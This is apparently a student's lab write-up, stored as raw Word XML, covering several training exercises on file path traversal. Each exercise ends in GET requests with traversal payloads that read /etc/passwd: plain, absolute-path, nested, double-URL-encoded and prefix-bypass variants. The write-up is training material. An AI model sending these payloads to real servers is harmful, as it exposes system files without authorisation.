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9005DA" w14:textId="6017FFB4" w:rsidR="008E7050" w:rsidRDefault="00FA0DB0">
      <w:r w:rsidRPr="00FA0DB0">
        <w:t>Lab: File path traversal, simple case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF93016" w14:textId="29032DD6" w:rsidR="00FA0DB0" w:rsidRDefault="00FA0DB0">
      <w:r>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidR="00C23FCE" w:rsidRPr="00C23FCE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C23FCE" w:rsidRPr="00C23FCE">
        <w:t>This lab contains a path traversal vulnerability in the display of product images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41545542" w14:textId="0DA2E0C8" w:rsidR="00FA0DB0" w:rsidRDefault="00C23FCE">
      <w:r>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C23FCE">
        <w:t xml:space="preserve"> retrieve the contents of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C23FCE">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C23FCE">
        <w:t>/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6DD71" w14:textId="57240236" w:rsidR="00C23FCE" w:rsidRDefault="00C23FCE">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C44DC0A" w14:textId="790C99D2" w:rsidR="00F4748C" w:rsidRDefault="00F4748C">
      <w:r>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4748C">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F4748C">
        <w:t>product?productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F4748C">
        <w:t>=../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F4748C">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F4748C">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E238AE" w14:textId="1123C5C4" w:rsidR="00F4748C" w:rsidRDefault="00F4748C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2466A9FA" wp14:editId="330B715D">
            <wp:extent cx="5943600" cy="3700145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15506042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04216" name="Picture 1" descr="A screen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F23C4" w14:textId="50128B4D" w:rsidR="008522B7" w:rsidRDefault="008522B7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="008522B7">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008522B7">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008522B7">
        <w:t>=../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008522B7">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008522B7">
        <w:t>/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7276DE63" wp14:editId="217860FD">
            <wp:extent cx="5943600" cy="3879850"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="70314929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4929" name="Picture 2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23DC" w14:textId="42443ECA" w:rsidR="005D039F" w:rsidRDefault="005D039F">
      <w:r w:rsidRPr="005D039F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F29A033" wp14:editId="0F3A440C">
            <wp:extent cx="5943600" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1574786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8655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20C0" w14:textId="77777777" w:rsidR="005875B3" w:rsidRPr="005875B3" w:rsidRDefault="005875B3" w:rsidP="005875B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005875B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab: File path traversal, traversal sequences blocked with absolute path bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED7F993" w14:textId="104059E0" w:rsidR="006E5A02" w:rsidRDefault="005875B3" w:rsidP="006E5A02">
      <w:r>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidR="006E5A02" w:rsidRPr="006E5A02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E5A02">
        <w:t>This lab contains a path traversal vulnerability in the display of product images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E6526" w14:textId="77777777" w:rsidR="006E5A02" w:rsidRDefault="006E5A02" w:rsidP="006E5A02"/>
    <w:p w14:paraId="4ABD103C" w14:textId="37CB6076" w:rsidR="005D039F" w:rsidRDefault="006E5A02" w:rsidP="006E5A02">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AEDBA" w14:textId="650B47AA" w:rsidR="005875B3" w:rsidRDefault="005875B3">
      <w:r>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidR="009F1759" w:rsidRPr="009F1759">
        <w:t xml:space="preserve"> retrieve the contents of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F1759" w:rsidRPr="009F1759">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F1759" w:rsidRPr="009F1759">
        <w:t>/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B0DE9" w14:textId="4F67DAB6" w:rsidR="005875B3" w:rsidRDefault="005875B3">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCBE9E3" w14:textId="53BF74A3" w:rsidR="005048BD" w:rsidRDefault="005048BD">
      <w:r>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidR="00E45734" w:rsidRPr="00E45734">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E45734" w:rsidRPr="00E45734">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E45734" w:rsidRPr="00E45734">
        <w:t>=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E45734" w:rsidRPr="00E45734">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E45734" w:rsidRPr="00E45734">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7EFF5A" w14:textId="606B379E" w:rsidR="005048BD" w:rsidRDefault="005048BD">
      <w:r w:rsidRPr="005048BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C418610" wp14:editId="407BA7B5">
            <wp:extent cx="5943600" cy="2873375"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="741352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3526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75A1C" w14:textId="77777777" w:rsidR="008738E5" w:rsidRDefault="00E45734" w:rsidP="008738E5">
      <w:r>
        <w:t>We use without</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/../../ </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because he told </w:t>
      </w:r>
      <w:r w:rsidR="008738E5">
        <w:t xml:space="preserve">us that the app blocks traversal sequence </w:t>
      </w:r>
      <w:r w:rsidR="008738E5">
        <w:t>but treats the supplied filename as being relative to a default working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A135BFA" w14:textId="3ED1A59C" w:rsidR="00E45734" w:rsidRDefault="00CC2467">
      <w:r w:rsidRPr="00CC2467">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BCB2778" wp14:editId="6EB32FB2">
            <wp:extent cx="5943600" cy="2792095"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1517634980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34980" name="Picture 1" descr="A screenshot of a websit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E5C3E" w14:textId="77777777" w:rsidR="00CC2467" w:rsidRPr="00CC2467" w:rsidRDefault="00CC2467" w:rsidP="00CC2467">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2467">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab: File path traversal, traversal sequences stripped non-recursively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559D1733" w14:textId="277CD0DF" w:rsidR="00ED32D5" w:rsidRDefault="00CC2467" w:rsidP="00ED32D5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidR="00ED32D5" w:rsidRPr="00ED32D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED32D5">
        <w:t>This lab contains a path traversal vulnerability in the display of product images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068FDCAB" w14:textId="77777777" w:rsidR="00ED32D5" w:rsidRDefault="00ED32D5" w:rsidP="00ED32D5"/>
    <w:p w14:paraId="1F7A30E1" w14:textId="58113721" w:rsidR="00CC2467" w:rsidRDefault="00ED32D5" w:rsidP="00ED32D5">
      <w:r>
        <w:t>The application strips path traversal sequences from the user-supplied filename before using it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08466BB6" w14:textId="3A403484" w:rsidR="00CC2467" w:rsidRDefault="00CC2467">
      <w:r>
        <w:t>Goals:</w:t>
      </w:r>
      <w:r w:rsidR="00ED32D5" w:rsidRPr="00ED32D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED32D5" w:rsidRPr="00ED32D5">
        <w:t>retrieve the contents of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED32D5" w:rsidRPr="00ED32D5">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED32D5" w:rsidRPr="00ED32D5">
        <w:t>/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735BD034" w14:textId="7331437B" w:rsidR="00CC2467" w:rsidRDefault="00CC2467">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F65B09" w14:textId="737F0350" w:rsidR="00092505" w:rsidRDefault="00092505">
      <w:r>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidR="00D65D98" w:rsidRPr="00D65D98">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D65D98" w:rsidRPr="00D65D98">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D65D98" w:rsidRPr="00D65D98">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D65D98" w:rsidRPr="00D65D98">
        <w:t>=../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D65D98" w:rsidRPr="00D65D98">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D65D98" w:rsidRPr="00D65D98">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A71E36" w14:textId="462492C8" w:rsidR="00092505" w:rsidRDefault="00092505">
      <w:r w:rsidRPr="00092505">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041FE138" wp14:editId="0344D1B0">
            <wp:extent cx="5943600" cy="2531745"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="127198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871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A2A0" w14:textId="38DC9BEE" w:rsidR="00D65D98" w:rsidRDefault="00D65D98">
      <w:r>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D65D98">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D65D98">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D65D98">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D65D98">
        <w:t>=../../</w:t>
      </w:r>
      <w:r>
        <w:t>../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D65D98">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D65D98">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72213C3E" w14:textId="1F3C28D6" w:rsidR="00D65D98" w:rsidRDefault="00D65D98">
      <w:r w:rsidRPr="00D65D98">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61F76D5C" wp14:editId="322DB562">
            <wp:extent cx="5943600" cy="3121660"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="485626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62664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B0FB4" w14:textId="033EBC23" w:rsidR="00FD1A37" w:rsidRDefault="00FD1A37">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3-</w:t>
      </w:r>
      <w:r w:rsidR="004759F8" w:rsidRPr="004759F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004759F8" w:rsidRPr="004759F8">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004759F8" w:rsidRPr="004759F8">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004759F8" w:rsidRPr="004759F8">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004759F8" w:rsidRPr="004759F8">
        <w:t>....//....//....//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004759F8" w:rsidRPr="004759F8">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004759F8" w:rsidRPr="004759F8">
        <w:t>/passwd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4AB93934" w14:textId="26C01A3F" w:rsidR="00FD1A37" w:rsidRDefault="00FD1A37">
      <w:r w:rsidRPr="00FD1A37">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32BBAA72" wp14:editId="1E5A70B9">
            <wp:extent cx="5943600" cy="3091180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16874772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7722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B22B" w14:textId="6A7321D9" w:rsidR="00462E19" w:rsidRDefault="00462E19" w:rsidP="00462E19">
      <w:r w:rsidRPr="004759F8">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004759F8">
        <w:t>....//....//....//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004759F8">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004759F8">
        <w:t>/passwd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we use this </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because we want to stripped the ../ </w:t>
      </w:r>
      <w:r w:rsidR="006D6F06">
        <w:t>the result will be ../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D6F06">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D6F06">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407CBCD9" w14:textId="77777777" w:rsidR="00462E19" w:rsidRDefault="00462E19"/>
    <w:p w14:paraId="3D531B4D" w14:textId="645BF305" w:rsidR="004759F8" w:rsidRDefault="004759F8">
      <w:r w:rsidRPr="004759F8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3686E78D" wp14:editId="6B90E586">
            <wp:extent cx="5943600" cy="2989580"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="2072334773" name="Picture 1" descr="A person in a dog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334773" name="Picture 1" descr="A person in a dog garmen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F8E1" w14:textId="77777777" w:rsidR="00137DFC" w:rsidRPr="00137DFC" w:rsidRDefault="00137DFC" w:rsidP="00137DFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00137DFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab: File path traversal, traversal sequences stripped with superfluous URL-decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD52381" w14:textId="4C4045F5" w:rsidR="00137DFC" w:rsidRDefault="00137DFC">
      <w:r>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidR="00EF0E3A" w:rsidRPr="00EF0E3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF0E3A" w:rsidRPr="00EF0E3A">
        <w:t>The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56196762" w14:textId="3EC6D9D4" w:rsidR="00137DFC" w:rsidRDefault="00137DFC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidR="00EF0E3A" w:rsidRPr="00EF0E3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF0E3A" w:rsidRPr="00EF0E3A">
        <w:t>retrieve the contents of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF0E3A" w:rsidRPr="00EF0E3A">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF0E3A" w:rsidRPr="00EF0E3A">
        <w:t>/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7EDA41" w14:textId="55AC73E1" w:rsidR="00137DFC" w:rsidRDefault="00137DFC">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE3FB9" w14:textId="601DEDFB" w:rsidR="00033CF5" w:rsidRDefault="00033CF5">
      <w:r>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidR="0016778B" w:rsidRPr="0016778B">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0016778B" w:rsidRPr="0016778B">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0016778B" w:rsidRPr="0016778B">
        <w:t>=../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0016778B" w:rsidRPr="0016778B">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0016778B" w:rsidRPr="0016778B">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7BEC2D" w14:textId="0C049E93" w:rsidR="00033CF5" w:rsidRDefault="00033CF5">
      <w:r w:rsidRPr="00033CF5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28442A3F" wp14:editId="6F37E186">
            <wp:extent cx="5943600" cy="2450465"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="10739380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3803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A874" w14:textId="46AD169C" w:rsidR="00B120D5" w:rsidRDefault="00B120D5">
      <w:r>
        <w:t>2-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD58B10" w14:textId="072D03C3" w:rsidR="00B120D5" w:rsidRDefault="00B120D5">
      <w:r w:rsidRPr="00B120D5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64F5FD8B" wp14:editId="2A625F44">
            <wp:extent cx="5943600" cy="2953385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22671374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13744" name="Picture 1" descr="A screenshot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B8BCC" w14:textId="21859AD0" w:rsidR="00561EC0" w:rsidRDefault="00561EC0">
      <w:r w:rsidRPr="00561EC0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D90D011" wp14:editId="0AF3D038">
            <wp:extent cx="5943600" cy="2718435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="12525983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9837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4FE2A" w14:textId="660DF21F" w:rsidR="00C9158F" w:rsidRDefault="00C9158F">
      <w:r w:rsidRPr="00C9158F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="400E8F3D" wp14:editId="1BAAE44C">
            <wp:extent cx="5943600" cy="2741930"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="274585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585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6520" w14:textId="18EAED26" w:rsidR="00706050" w:rsidRDefault="00706050">
      <w:r w:rsidRPr="00706050">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00706050">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00706050">
        <w:t>=..%252f..%252f..%252fetc%2Fpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E7D98E" w14:textId="5DAAE7AB" w:rsidR="00706050" w:rsidRDefault="00706050">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00867A8B" wp14:editId="0798857A">
            <wp:extent cx="5943600" cy="2811145"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1062851781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851781" name="Picture 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93102" w14:textId="6680E500" w:rsidR="00EC4C78" w:rsidRDefault="00EC4C78">
      <w:r w:rsidRPr="00EC4C78">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DE1480" wp14:editId="7D197288">
            <wp:extent cx="5943600" cy="2807970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="242036136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036136" name="Picture 1" descr="A screenshot of a web p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E7EE" w14:textId="77777777" w:rsidR="00F22746" w:rsidRPr="00F22746" w:rsidRDefault="00F22746" w:rsidP="00F22746">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F22746">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab: File path traversal, validation of start of path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E788F4" w14:textId="67828866" w:rsidR="00F22746" w:rsidRDefault="00711B56">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F22746">
        <w:t>robl</w:t>
      </w:r>
      <w:r>
        <w:t>em:</w:t>
      </w:r>
      <w:r w:rsidR="00FF68C1" w:rsidRPr="00FF68C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF68C1" w:rsidRPr="00FF68C1">
        <w:t xml:space="preserve">The application transmits the full file path via a request </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FF68C1" w:rsidRPr="00FF68C1">
        <w:t>parameter, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FF68C1" w:rsidRPr="00FF68C1">
        <w:t xml:space="preserve"> validates that the supplied path starts with the expected folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F303B1" w14:textId="0DE43294" w:rsidR="00711B56" w:rsidRDefault="00711B56">
      <w:r>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidR="00FF68C1" w:rsidRPr="00FF68C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF68C1" w:rsidRPr="00FF68C1">
        <w:t>retrieve the contents of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF68C1" w:rsidRPr="00FF68C1">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF68C1" w:rsidRPr="00FF68C1">
        <w:t>/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A28B59F" w14:textId="130712CC" w:rsidR="00711B56" w:rsidRDefault="00711B56">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E06A839" w14:textId="3F66A65E" w:rsidR="00775A7B" w:rsidRDefault="00775A7B">
      <w:r>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidR="004E7B67" w:rsidRPr="004E7B67">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E7B67" w:rsidRPr="004E7B67">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E7B67" w:rsidRPr="004E7B67">
        <w:t>=/var/www/images</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E7B67" w:rsidRPr="004E7B67">
        <w:t>/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E7B67" w:rsidRPr="004E7B67">
        <w:t>/../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E7B67" w:rsidRPr="004E7B67">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E7B67" w:rsidRPr="004E7B67">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8AF05" w14:textId="5938AE5A" w:rsidR="00775A7B" w:rsidRDefault="00775A7B">
      <w:r w:rsidRPr="00775A7B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E85906E" wp14:editId="35B2C865">
            <wp:extent cx="5943600" cy="2931160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="8901877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779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2569D" w14:textId="6B3A10FD" w:rsidR="004E7B67" w:rsidRDefault="004E7B67">
      <w:r w:rsidRPr="004E7B67">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DAA9985" wp14:editId="018541E5">
            <wp:extent cx="5943600" cy="2978150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127774193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741938" name="Picture 1" descr="A screenshot of a websit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026DD" w14:textId="77777777" w:rsidR="0005195D" w:rsidRPr="0005195D" w:rsidRDefault="0005195D" w:rsidP="0005195D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0005195D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab: File path traversal, validation of file extension with null byte bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDAAAC6" w14:textId="36DE3256" w:rsidR="0005195D" w:rsidRDefault="0005195D">
      <w:r>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidR="00012620" w:rsidRPr="00012620">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00012620" w:rsidRPr="00012620">
        <w:t>The application validates that the supplied filename ends with the expected file extension.</w:t>
      </w:r>
    </w:p>
